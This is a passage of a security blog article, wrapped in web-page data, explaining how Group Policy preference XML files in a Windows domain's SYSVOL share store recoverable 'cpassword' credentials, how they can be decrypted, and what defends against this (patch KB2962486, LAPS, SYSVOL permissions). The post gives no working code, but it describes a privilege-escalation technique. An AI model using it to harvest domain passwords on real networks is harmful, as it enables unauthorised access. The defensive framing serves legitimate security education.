below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016750976_8_9372477512-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Exploitable Areas in Group Policy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Exploitable areas in Group Policy are not limited to the location for modifying administrator passwords, but also include the following:\u003C\u002Fp>\u003Cp>Services\\Services.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc980070(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>ScheduledTasks\\ScheduledTasks.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422920(v=prot.13)\u003C\u002Fli>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fdd341350(v=prot.13)\u003C\u002Fli>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fdd304114(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Printers\\Printers.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422918(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Drives\\Drives.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc704598(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>DataSources\\DataSources.xml\u003C\u002Fp>\u003Cul>\u003Cli>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc422926(v=prot.13)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Location referenced from https:\u002F\u002Fwebcache.googleusercontent.com\u002Fsearch?q=cache:MUNO5X9hSwUJ:rewtdance.blogspot.com\u002F2012\u002F06\u002Fexploiting-windows-2008-group-policy.html+&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us\u003C\u002Fp>\u003Cp>However, the above location is not absolute; during configuration, it is necessary to enter the username and password in the Group Policy, and the corresponding Groups.xml will contain the cpassword attribute, which can then be used to restore the plaintext password\u003C\u002Fp>\u003Cp>Take scheduled tasks as an example, corresponding to ScheduledTasks.xml\u003C\u002Fp>\u003Cp>The Group Policy configuration location is: User Configuration - Preferences - Control Panel Settings - Scheduled Tasks\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016751951_9_4d634b5685-1.jpeg\">\u003C\u002Fp>\u003Cp>When creating a new task, it is necessary to select 'Run as' and enter the username and password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016752931_10_7adea024e8-1.jpeg\">\u003C\u002Fp>\u003Cp>Otherwise, it will not contain the cpassword attribute, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016753798_11_8a88503a7a-1.jpeg\">\u003C\u002Fp>\u003Cp>Now enter a test password (the password is testsuccess!, fake), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016754388_12_38da4b9dbb-1.jpeg\">\u003C\u002Fp>\u003Cp>The corresponding ScheduledTasks.xml will also contain the cpassword attribute, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016754714_13_af2c803ede-1.jpeg\">\u003C\u002Fp>\u003Cp>Use PowerShell to decrypt it and restore the password as testsuccess!\u003C\u002Fp>\u003Cp>Thus, it is concluded that:\u003C\u002Fp>\u003Cp>\u003Cstrong>When domain administrators use Group Policy to manage domain hosts in bulk, if a password needs to be entered during the configuration of the Group Policy, that password will be saved to the shared folder \\\\SYSVOL, which is accessible by all domain users by default. Although encrypted, it can be easily decrypted.\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This creates a security risk. In practice, domain administrators often use domain administrator passwords in Group Policy, making the passwords in Group Policy configuration files easily obtainable and leading to privilege escalation.\u003C\u002Fp>\u003Cp>To address this, Microsoft released patch KB2962486, available for download at:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Flibrary\u002Fsecurity\u002Fms14-025\u003C\u002Fp>\u003Cp>After applying the patch, usernames and passwords can no longer be set in Group Policy, as shown in the following images:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016755281_14_7b00c54399-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016755420_15_07d981b581-1.jpeg\">\u003C\u002Fp>\u003Cp>Of course, the XML files in the shared folder \\\\SYSVOL will no longer contain the cpassword attribute.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>XML files will still synchronize with Group Policy.\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the attack methods, the following defense options are available:\u003C\u002Fp>\u003Cp>1. Use LAPS to manage local administrator accounts on domain hosts in bulk.\u003C\u002Fp>\u003Cp>2. Install patch KB2962486 on domain controllers\u003C\u002Fp>\u003Cp>3. Do not use domain controller passwords in Group Policy\u003C\u002Fp>\u003Cp>4. Set access permissions for the shared folder \\\\SYSVOL\u003C\u002Fp>\u003Cp>5. Use PsPasswd to batch modify local administrator passwords of hosts in the domain\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article explains how to recover passwords stored in Group Policy using SYSVOL and provides defense recommendations. If an attacker obtains the local administrator password of a domain user, it can be used by default for remote login within the domain.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",89,"Onedaysec",7,"published","2026-02-02T07:25:19.687Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Recover Passwords from Group Policy via SYSVOL in Domain Penetration","domain penetration, SYSVOL, Group Policy, password recovery, local administrator, security exploit, defense recommendations",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],1146,1145,1144,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.277Z","2026-07-23T16:02:35.692Z","draft","2026-07-23T16:17:00.634Z"]